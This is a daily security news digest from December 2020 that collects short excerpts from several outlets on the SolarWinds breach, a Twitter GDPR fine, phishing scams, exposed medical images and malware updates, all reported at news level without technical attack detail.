Security daily (15-12-2020)

SolarWinds breach has industrial firms checking their networks for vulnerabilities

Executives from multiple U.S. electric utilities on Monday convened a phone call to discuss a critical vulnerability in software made by SolarWinds, the federal contractor at the heart of an apparent cyber-espionage operation. The briefing, hosted by an industry-government group known as the Electricity Subsector Coordinating Council, is just one example of the wide ripple effects of the malicious tampering of SolarWinds’ software by suspected state-sponsored hackers. The SolarWinds compromise has reportedly led to the breaches of multiple U.S. federal agencies, including the departments of Treasury and Homeland Security. The affected software is widely used in the electricity, oil and gas and manufacturing sectors, and the process of assessing some organizations’ exposure to the bug has only just started. “We have to make sure we’re breaking down some of these concepts so they understand the impact to them as critical infrastructure owners and operators,” said one U.S. official involved in […] The post SolarWinds breach has industrial firms checking their networks for vulnerabilities appeared first on CyberScoop. (CyberScoop)

National security officials brief Biden team on SolarWinds hacking campaign

U.S. national security officials have briefed the transition team for President-elect Joe Biden and Capitol Hill aides on the consequences of a suspected government-backed hacking campaign affecting multiple federal agencies, according to multiple people familiar with the matter. Trump administration officials held multiple briefings on the topic for Biden aides on Monday, and there is a classified briefing slated for Tuesday, according to a person familiar with the briefings. Among the agencies briefing Biden staff on Monday was the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, a CISA official said. The hacking campaign, which the Washington Post reported as being tied to Russia, forced an emergency meeting of the White House National Security Council and prompted some lawmakers to call for new approaches to defending U.S. companies from malicious cyber activity. Responding to the apparent cyber-espionage effort could be one of the first big tests of Biden’s cybersecurity […] The post National security officials brief Biden team on SolarWinds hacking campaign appeared first on CyberScoop. (CyberScoop)

Here comes the bride: New map matches threat intel to cyberdefenses

A popular method that organizations lean on to reduce their cybersecurity risks is marrying a popular tool that cyber pros consult when they analyze hacking groups — in a way they think everyone can use. The project to conjoin the National Institute of Standards and Technology’s cybersecurity framework and MITRE ATT&CK framework, announced Tuesday, comes with backing from big players: JPMorgan Chase, a nonprofit center operated by an offshoot of MITRE, the cybersecurity company AttackIQ and the nonprofit Center for Internet Security that’s perhaps best known for its work with state and local governments. The idea behind the mapping project is to harmonize the risk management sides of cyber with the threat intelligence side of cyber, via models that any organization can employ. Usually unifying those two sides would be something that only a large outfit, like the U.S. military or major investment banks, would be able to pull off, […] The post Here comes the bride: New map matches threat intel to cyberdefenses appeared first on CyberScoop. (CyberScoop)

Twitter fined nearly $550,000 in Europe for response to bug that exposed private tweets

Regulators in Ireland have fined Twitter for failing to report a data breach promptly and not adequately documenting the incident, marking the first time the regulator has penalized a “big tech” company for violations of Europe’s data protection law. The fine of 450,000 euros, or about $550,000, stems from a bug that allowed thousands of people’s private tweets to be made public between late 2014 and early 2019, when Twitter reported the problem to European authorities. The social media company said it could only identify specific users affected by the breach from September 2017 onward — about 89,000 total over that stretch. The bug only affected users of Twitter’s Android app. Ireland’s Data Protection Commission issued the decision Tuesday on behalf of the European Union, under the EU’s General Data Protection Regulation (GDPR). Twitter’s European headquarters are in Ireland, as are those of Google, Facebook and several other multibillion-dollar U.S. […] The post Twitter fined nearly $550,000 in Europe for response to bug that exposed private tweets appeared first on CyberScoop. (CyberScoop)

Naked Security Live – How to avoid “big brand” email scams

Here's the latest Naked Security video - watch now (and please share with your friends)! (Naked Security)

Phishing tricks that really work – and how to avoid them

Get inside the mindset of your adversaries to increase your chances of spotting a phish. (Naked Security)

DHS Among Those Hit In Sophisticated Cyberattack By Foreign Adversaries

(News ≈ Packet Storm)

Spotify Notifies Customers Of Breach, Files Under CCPA

(News ≈ Packet Storm)

Hospitals Are Leaving Millions Of Sensitive Medical Images Exposed Online

(News ≈ Packet Storm)

18k Customers Downloaded The SolarWinds Backdoored Software

(News ≈ Packet Storm)

Why You Should Monitor Your Website

In an effort to maintain unauthorized access or profit off a website’s environment long after an initial compromise, attackers commonly leverage a variety of different techniques and tactics. These techniques range from adding backdoors, stealing sensitive data, redirecting the site to other third-party resources, or even injecting specially crafted links to give their own sites a SERP boost. Knowing exactly which JavaScript files are supposed to load whenever you visit your website is a good practice — and in many cases, a great way to tell if your site has been compromised. Continue reading Why You Should Monitor Your Website at Sucuri Blog. (Sucuri Blog)

Subway Sandwich Loyalty-Card Users Suffer Ham-Handed Phishing Scam

Subway loyalty program members in U.K. and Ireland have been sent scam emails to trick them into downloading malware. (Threatpost)

Easy WP SMTP Security Bug Can Reveal Admin Credentials

A poorly configured file opens users up to site takeover. (Threatpost)

Gitpaste-12 Worm Widens Set of Exploits in New Attacks

The worm returned in recent attacks against web applications, IP cameras and routers. (Threatpost)

Firefox Patches Critical Mystery Bug, Also Impacting Google Chrome

Mozilla Foundation releases Firefox 84 browser, fixing several flaws and delivering performance gains and Apple processor support. (Threatpost)

45 Million Medical Images Left Exposed Online

A six-month investigation by CybelAngel discovered unsecured sensitive patient data available for third parties to access for blackmail, fraud or other nefarious purposes. (Threatpost)

Agent Tesla Keylogger Gets Data Theft and Targeting Update

The infamous keylogger has shifted its targeting tactics and now collects stored credentials for less-popular web browsers and email clients. (Threatpost)

Millions of Unpatched IoT, OT Devices Threaten Critical Infrastructure

Industrial, factory and medical gear remain largely unpatched when it comes to the URGENT/11 and CDPwn groups of vulnerabilities. (Threatpost)


/security-daily/ 16-12-2020 23:44:24